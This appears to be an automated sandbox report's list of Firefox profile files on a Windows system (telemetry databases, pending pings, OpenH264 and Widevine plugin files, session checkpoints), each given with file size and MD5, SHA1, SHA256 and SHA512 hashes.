C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp
Filesize25KB
MD52bea1f269e6fdafce99b84171c77407e
SHA15ad26a34cbb13c4b36a845862349063ea7108426
SHA256d592cdf3f47c9a649d561effe1f58ee17e8e9736a7961a0acc884a9dc086286d
SHA512019c40366b702ccd9abea9c077c0aee3d716d0edf93c13e439ebec2a3a6313b8419a28cbe9cacf2576555a3a472480dc32fa0716562bd7253449edadc9b8163f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp
Filesize21KB
MD54ebf22a7002ff7ff59759436d3e3fba0
SHA182bd1d6d931e4e7f9960de64a1c74c71de1b65e4
SHA2566ae5315cb84208695e2d36653c7c4c8d814c803adceef498b1a0c30fcfda4bbc
SHA512a517954a189c48ae8e334f8924a1c1c18db98289f15f8fcd0d0af1c526d07243b686da159f1fe45d1f52f4f07e7f26f254c3d46cc12ac0c06ae0f33bb8d7e55c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp
Filesize25KB
MD54029f0d42b19ecaaa2b4fd4e09d097cd
SHA111eee12e92f5b4d95b33415c8f087d5bed783193
SHA2569840bb57336304de116d69d3043ae4bf613e68802d7e1e76fcc99ef7a2308208
SHA51288743753c6cb420ea372c20732662fcbd86e51d0e24e231725f2cf09919f83e770f13aa5a5ec4e3e748544366222d0f530a1846859628f491d3db31a9b9ef4ad
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD512e43fb2f7d7c8bf68a023ac494a3842
SHA193d95c85065d8c4b769da84b1a6015e78ea759c5
SHA256d1628befcaae6fe3c9dc1daafc90a401c9cb3a0f6822f8a4e9c40dd7bcc193b9
SHA512ed38b3e8c497841e4392196435f4945fe6b134f004b63a39b0ce5bb69120f2b3e1cc9991555aa2e7fc77f9d70249f2edd52613c4a35d81de6eb2b4c37afd3826
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\a4592ec7-05a9-43a2-8261-129f34ad2fbc
Filesize982B
MD52cf14c7f983d92a50f1e96c488a8f4fb
SHA1707c3a02cf5fe7786c2c9551485904de8d836dfb
SHA256ec67f8ac861eae9dd69bb8d9b555b88f804415a31611f144572f261d522be5b0
SHA512a79734786b9fc7745f90796f6d20230eb429c22a4ee9237116584e08166f6b272616de5e0ab68b9360429021186122e6a3a9457e2a2206af9ed11aee1c003e11
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\dc3bc782-7067-49b7-b1e5-ba368d748333
Filesize659B
MD512c382adc12dbf187b6eae250180e787
SHA11c7aa62b6b7e1ea2ba7061398f520319a89a0d02
SHA256c382bd37d4848d3d008adf753a2f929fc6d13fa61a01a85c86f367ff581bee01
SHA51282b259f4fbf7e82ca83f7dca23d5fa418d0ed5c6dcca1d836003f0e21bf92b7330b9356a3a238fc59697452701eadd9fe10b740cdc07a0c12025a57861b82103
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
9KB
MD5a1e437259b57d256174d167809ead3e1
SHA15e4a09f432491ce99e6e4e8664e398f94291ea70
SHA256d8712dd1b675586e7de26aec4be06c3cd512eab8b911ebdfd1620a00e3085222
SHA5127404ba0bae64c5c378e029d1602853657eab3d35bdb3570540f9a7c0d48fe51d875d873c1ca9b795c8d16bf5ecac5f896cc7e035cbc65c2dba2e9f646b885436
-
Filesize
10KB
MD5f4d7491b97f8c4fcd334f5e780bf8bf7
SHA112d61543bd8ba09eba3b8a35a0909ac2b0a9e58c
SHA256135370d74d3d217cc2ce1a9c124e9556dbb03334d1ea49a209b85bfb2b0a2267
SHA5125b0ded383295a91cb1b618343a5f08777e866d4c68df862f47ff106c434a37f6808af0c8f96914809447b4568be4ff8f97285578aee23240aae9502a61be8c3c
-
Filesize
14KB
MD5b440a20a97994548d8ea72a6b76d33df
SHA19cf270882787de70c5efefb5cd6f4468de8ad189
SHA256b91c60fd4ab734c137962f73210b869c41a11588bed024c9181695fb0402d1aa
SHA512b85a27b78286a5cf827890cc1ac4896994212429fa3b9fe5b2995576f27e033bf41b558cf74c78cdb33974f864326e5d1814ba92b3dcbae5630044a38143f794
-
Filesize
9KB
MD513fd413979fa44ebbfafc555cb97ec86
SHA1d590729a9b0aedc94f54edd5caefdfa5ff6024e1
SHA256fb2fe7569ba6781caef9599dab937c3fcd6c4721556d8242e34bbfcec1265ba3
SHA5124da088b7746bfdd16396589759757e50ced3cc0c025828ac39c24dedc1239734a9f1155d816c25bb98efd8a8bf2c6bc49df774b60fbc778eca35fa12322397dd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\sessionCheckpoints.json
Filesize53B
MD5ea8b62857dfdbd3d0be7d7e4a954ec9a
SHA1b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a
SHA256792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da
SHA512076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19